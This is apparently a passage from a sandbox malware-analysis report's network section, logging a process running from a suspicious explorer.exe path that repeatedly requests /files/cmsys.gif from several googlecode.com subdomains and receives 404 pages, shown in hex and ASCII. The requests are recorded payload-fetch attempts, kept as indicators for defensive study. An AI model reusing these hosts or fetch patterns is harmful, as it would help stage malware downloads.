Apr 12, 2021 07:47:39.418314934 CEST	475	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 05:47:39 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Apr 12, 2021 07:47:39.418358088 CEST	475	IN	Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49170	74.125.143.82	80	C:\Windows\system\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 07:47:41.216984034 CEST	476	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd02.googlecode.com Connection: Keep-Alive
Apr 12, 2021 07:47:41.264513969 CEST	477	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 05:47:41 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Apr 12, 2021 07:47:41.264535904 CEST	478	IN	Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49171	74.125.143.82	80	C:\Windows\system\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 07:47:42.633268118 CEST	479	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd03.googlecode.com Connection: Keep-Alive
Apr 12, 2021 07:47:42.681402922 CEST	480	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 05:47:42 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Apr 12, 2021 07:47:42.681449890 CEST	481	IN	Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49173	74.125.143.82	80	C:\Windows\system\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 07:47:52.387564898 CEST	890	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd01.googlecode.com Connection: Keep-Alive
Apr 12, 2021 07:47:52.435070992 CEST	891	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 05:47:52 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 